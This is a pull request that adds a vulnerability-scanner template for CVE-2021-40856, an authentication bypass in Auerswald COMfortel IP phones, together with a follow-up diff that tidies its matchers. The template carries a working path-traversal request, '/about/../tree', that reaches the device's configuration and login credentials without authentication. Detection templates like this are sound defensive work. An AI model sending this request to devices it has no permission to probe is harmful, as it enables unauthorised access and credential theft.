### PR TITLE
Create CVE-2021-40856.yaml

### DIFF
--- a/cves/2021/CVE-2021-40856.yaml
+++ b/cves/2021/CVE-2021-40856.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
-  tags: cve,cve2021,comfortel,lfi,auth-bypass
+  tags: cve,cve2021,comfortel,auth-bypass
 
 requests:
   - raw:
@@ -21,16 +21,16 @@ requests:
     matchers:
       - type: word
         part: body
-        regex:
-          - "TYPE"
-          - "ITEMS"
-          - "COUNT"
+        words:
+          - '"TYPE"'
+          - '"ITEMS"'
+          - '"COUNT"'
         condition: and
 
       - type: word
+        part: header
         words:
           - application/json
-        part: header
 
       - type: status
         status:

--- a/cves/2021/CVE-2021-40856.yaml
+++ b/cves/2021/CVE-2021-40856.yaml
@@ -1,0 +1,37 @@
+id: CVE-2021-40856
+
+info:
+  name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
+  author: gy741
+  severity: medium
+  description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
+  reference:
+    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
+  tags: cve,cve2021,comfortel,lfi,auth-bypass
+
+requests:
+  - raw:
+      - |
+        GET /about/../tree?action=get HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        regex:
+          - "TYPE"
+          - "ITEMS"
+          - "COUNT"
+        condition: and
+
+      - type: word
+        words:
+          - application/json
+        part: header
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-40856

```
Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
```

Thanks

- References: https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO